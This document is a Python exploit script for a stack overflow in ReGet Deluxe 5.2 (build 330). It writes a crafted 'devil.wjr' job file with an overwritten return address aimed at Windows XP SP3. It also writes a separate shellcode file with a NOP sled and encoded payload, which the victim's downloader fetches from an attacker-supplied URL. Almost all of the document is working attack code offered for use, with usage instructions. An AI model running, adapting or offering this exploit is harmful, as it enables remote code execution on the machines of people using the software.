ReGet Deluxe 5.2 Stack Overflow

`import sys  
  
print ""  
print " ReGet Deluxe 5.2 (build 330) Stack Overflow Exploit"  
print " By: Encrypt3d.M!nd "  
print " http://m1nd3d.wordpress.com/ "  
print " For Details visit my blog "  
print ""  
  
  
try:  
  
header = (  
"\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22\x20\x65\x6E\x63\x6F"  
"\x64\x69\x6E\x67\x3D\x22\x55\x54\x46\x2D\x38\x22\x20\x3F\x3E\x0D\x0A\x3C\x21\x2D\x2D\x20\x47\x65"  
"\x6E\x65\x72\x61\x74\x65\x64\x20\x62\x79\x20\x52\x65\x47\x65\x74\x20\x44\x65\x6C\x75\x78\x65\x20"  
"\x35\x2E\x32\x20\x28\x62\x75\x69\x6C\x64\x20\x33\x33\x30\x29\x20\x2D\x2D\x3E\x0D\x0A\x3C\x52\x65"  
"\x47\x65\x74\x4A\x72\x0D\x0A\x09\x4C\x61\x73\x74\x49\x64\x3D\x22\x31\x22\x0D\x0A\x09\x50\x72\x65"  
"\x64\x65\x66\x69\x6E\x65\x64\x43\x61\x74\x65\x67\x6F\x72\x69\x65\x73\x3D\x22\x31\x22\x0D\x0A\x09"  
"\x54\x72\x61\x66\x66\x69\x63\x53\x75\x73\x70\x65\x6E\x64\x65\x64\x3D\x22\x31\x22\x0D\x0A\x09\x54"  
"\x72\x61\x66\x66\x69\x63\x43\x6F\x6F\x70\x65\x72\x61\x74\x69\x76\x65\x3D\x22\x32\x22\x0D\x0A\x09"  
"\x4D\x61\x78\x53\x65\x63\x74\x53\x75\x73\x70\x65\x6E\x64\x65\x64\x3D\x22\x31\x22\x0D\x0A\x09\x4D"  
"\x61\x78\x53\x65\x63\x74\x43\x6F\x6F\x70\x65\x72\x61\x74\x69\x76\x65\x3D\x22\x31\x22\x0D\x0A\x09"  
"\x4D\x61\x78\x53\x65\x63\x74\x55\x6E\x6C\x69\x6D\x69\x74\x65\x64\x3D\x22\x33\x22\x0D\x0A\x09\x53"  
"\x61\x76\x65\x54\x6F\x3D\x22\x43\x3A\x5C\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73\x20\x61\x6E\x64\x20"  
"\x53\x65\x74\x74\x69\x6E\x67\x73\x5C\x75\x6E\x6B\x6E\x6F\x77\x6E\x5C\x4D\x79\x20\x44\x6F\x63\x75"  
"\x6D\x65\x6E\x74\x73\x5C\x4D\x79\x20\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x73\x22\x0D\x0A\x09\x4D\x61"  
"\x78\x45\x72\x72\x6F\x72\x43\x6F\x75\x6E\x74\x3D\x22\x31\x30\x30\x22\x0D\x0A\x09\x54\x72\x79\x50"  
"\x61\x75\x73\x65\x3D\x22\x35\x22\x0D\x0A\x09\x54\x69\x6D\x65\x4F\x75\x74\x3D\x22\x39\x30\x22\x0D"  
"\x0A\x09\x4D\x69\x6E\x53\x65\x63\x74\x69\x6F\x6E\x53\x69\x7A\x65\x3D\x22\x31\x30\x30\x30\x30\x22"  
"\x0D\x0A\x09\x41\x75\x74\x6F\x53\x61\x76\x65\x52\x65\x73\x75\x6C\x74\x46\x69\x6C\x65\x3D\x22\x43"  
"\x3A\x5C\x50\x72\x6F\x67\x72\x61\x6D\x20\x46\x69\x6C\x65\x73\x5C\x52\x65\x47\x65\x74\x20\x53\x6F"  
"\x66\x74\x77\x61\x72\x65\x5C\x52\x65\x47\x65\x74\x20\x44\x65\x6C\x75\x78\x65\x5C\x73\x65\x61\x72"  
"\x63\x68\x2E\x78\x6D\x6C\x22\x0D\x0A\x09\x3E\x0D\x0A\x09\x3C\x51\x75\x65\x75\x65\x3E\x0D\x0A\x09"  
"\x09\x3C\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x0D\x0A\x09\x09\x09\x49\x64\x3D\x22\x31\x22\x0D\x0A\x09"  
"\x09\x09\x46\x69\x6C\x65\x4E\x61\x6D\x65\x3D\x22\x43\x3A\x5C\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73"  
"\x20\x61\x6E\x64\x20\x53\x65\x74\x74\x69\x6E\x67\x73\x5C\x75\x6E\x6B\x6E\x6F\x77\x6E\x5C\x4D\x79"  
"\x20\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73\x5C\x4D\x79\x20\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x73\x5C"  
"\x61\x2E\x65\x78\x65\x22\x0D\x0A\x09\x09\x09\x53\x74\x61\x74\x65\x3D\x22\x33\x22\x0D\x0A\x09\x09"  
"\x09\x44\x6F\x6E\x74\x55\x73\x65\x43\x61\x74\x65\x67\x6F\x72\x79\x53\x6F\x72\x74\x69\x6E\x67\x3D"  
"\x22\x30\x22\x0D\x0A\x09\x09\x09\x53\x74\x61\x72\x74\x44\x6C\x54\x69\x6D\x65\x3D\x22\x30\x22\x0D"  
"\x0A\x09\x09\x09\x43\x72\x65\x61\x74\x69\x6F\x6E\x54\x69\x6D\x65\x3D\x22\x32\x35\x2E\x31\x32\x2E"  
"\x32\x30\x30\x39\x20\x31\x34\x3A\x35\x38\x3A\x30\x32\x22\x0D\x0A\x09\x09\x09\x4C\x61\x73\x74\x53"  
"\x74\x61\x72\x74\x54\x69\x6D\x65\x3D\x22\x30\x22\x0D\x0A\x09\x09\x09\x55\x72\x6C\x3D\x22\x68\x74"  
"\x74\x70\x3A\x2F\x2F"+sys.argv[1]+"\x22\x0D\x0A\x09"  
"\x09\x09\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x43\x61\x74\x65\x67\x6F\x72\x79\x3D\x22\x2D\x31\x22\x0D"  
"\x0A\x09\x09\x09\x53\x61\x76\x65\x54\x6F\x3D\x22")  
  
buff = "\x41" * 268  
buff+= "\x5F\x4D\x48\x7E" # call edi - winxp sp3 (friendly chars)  
buff+= "\x41" * 1000  
  
foot = (  
"\x22\x0D\x0A\x09\x09\x09\x41\x75\x74\x6F\x53\x74\x61\x72\x74\x43\x72\x65\x61\x74\x65\x3D\x22\x31"  
"\x22\x0D\x0A\x09\x09\x20\x2F\x3E\x0D\x0A\x09\x3C\x2F\x51\x75\x65\x75\x65\x3E\x0D\x0A\x3C\x2F\x52"  
"\x65\x47\x65\x74\x4A\x72\x3E\x0D\x0A")  
  
evil = "\x90" * 100  
evil+= (  
"\x89\xe6\xd9\xc7\xd9\x76\xf4\x59\x49\x49\x49\x49\x49\x49\x49"  
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"  
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"  
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"  
"\x4c\x4a\x48\x4c\x49\x43\x30\x43\x30\x45\x50\x45\x30\x4b\x39"  
"\x4a\x45\x46\x51\x4e\x32\x51\x74\x4c\x4b\x46\x32\x44\x70\x4c"  
"\x4b\x42\x72\x44\x4c\x4e\x6b\x43\x62\x42\x34\x4e\x6b\x51\x62"  
"\x47\x58\x44\x4f\x48\x37\x51\x5a\x45\x76\x46\x51\x49\x6f\x45"  
"\x61\x4f\x30\x4e\x4c\x47\x4c\x51\x71\x51\x6c\x45\x52\x46\x4c"  
"\x47\x50\x4f\x31\x4a\x6f\x44\x4d\x45\x51\x4f\x37\x4d\x32\x48"  
"\x70\x42\x72\x46\x37\x4c\x4b\x46\x32\x42\x30\x4e\x6b\x50\x42"  
"\x45\x6c\x47\x71\x4e\x30\x4e\x6b\x51\x50\x51\x68\x4c\x45\x4f"  
"\x30\x44\x34\x51\x5a\x46\x61\x48\x50\x42\x70\x4c\x4b\x50\x48"  
"\x42\x38\x4c\x4b\x50\x58\x51\x30\x46\x61\x4e\x33\x4d\x33\x47"  
"\x4c\x43\x79\x4c\x4b\x50\x34\x4c\x4b\x46\x61\x4a\x76\x46\x51"  
"\x49\x6f\x44\x71\x49\x50\x4c\x6c\x4b\x71\x4a\x6f\x46\x6d\x47"  
"\x71\x4f\x37\x46\x58\x4b\x50\x43\x45\x4a\x54\x43\x33\x43\x4d"  
"\x4b\x48\x47\x4b\x43\x4d\x51\x34\x43\x45\x4b\x52\x42\x78\x4c"  
"\x4b\x46\x38\x45\x74\x46\x61\x4a\x73\x45\x36\x4c\x4b\x46\x6c"  
"\x50\x4b\x4e\x6b\x43\x68\x45\x4c\x46\x61\x4e\x33\x4c\x4b\x46"  
"\x64\x4e\x6b\x43\x31\x4e\x30\x4e\x69\x51\x54\x46\x44\x51\x34"  
"\x51\x4b\x51\x4b\x43\x51\x51\x49\x51\x4a\x50\x51\x49\x6f\x49"  
"\x70\x51\x48\x51\x4f\x43\x6a\x4c\x4b\x42\x32\x4a\x4b\x4f\x76"  
"\x43\x6d\x50\x6a\x47\x71\x4e\x6d\x4d\x55\x4e\x59\x47\x70\x43"  
"\x30\x45\x50\x46\x30\x42\x48\x44\x71\x4e\x6b\x42\x4f\x4f\x77"  
"\x4b\x4f\x4a\x75\x4d\x6b\x4d\x30\x45\x4d\x46\x4a\x44\x4a\x42"  
"\x48\x49\x36\x4c\x55\x4d\x6d\x4d\x4d\x49\x6f\x4e\x35\x45\x6c"  
"\x45\x56\x51\x6c\x44\x4a\x4b\x30\x4b\x4b\x4b\x50\x51\x65\x44"  
"\x45\x4d\x6b\x50\x47\x44\x53\x42\x52\x50\x6f\x42\x4a\x43\x30"  
"\x46\x33\x4b\x4f\x4a\x75\x42\x43\x50\x61\x50\x6c\x42\x43\x43"  
"\x30\x41\x41")  
  
evil+="\x41" * 70000  
  
  
wjr_file=open('devil.wjr','w')  
wjr_file.write(header+buff+foot)  
wjr_file.close()  
print "[+] 'devil.wjr' Created Successfully"  
  
devil_file=open('shellcode','w')  
devil_file.write(evil)  
devil_file.close()  
print "[+] 'shellcode' Created Successfully"  
  
except:  
print "###################################################"  
print " Usage: exploit.py [payload] "  
print " [payload] = url to shellcode without(http://) "  
print " Example: "  
print " exploit.py www.site.com/shellcode "  
  
  
`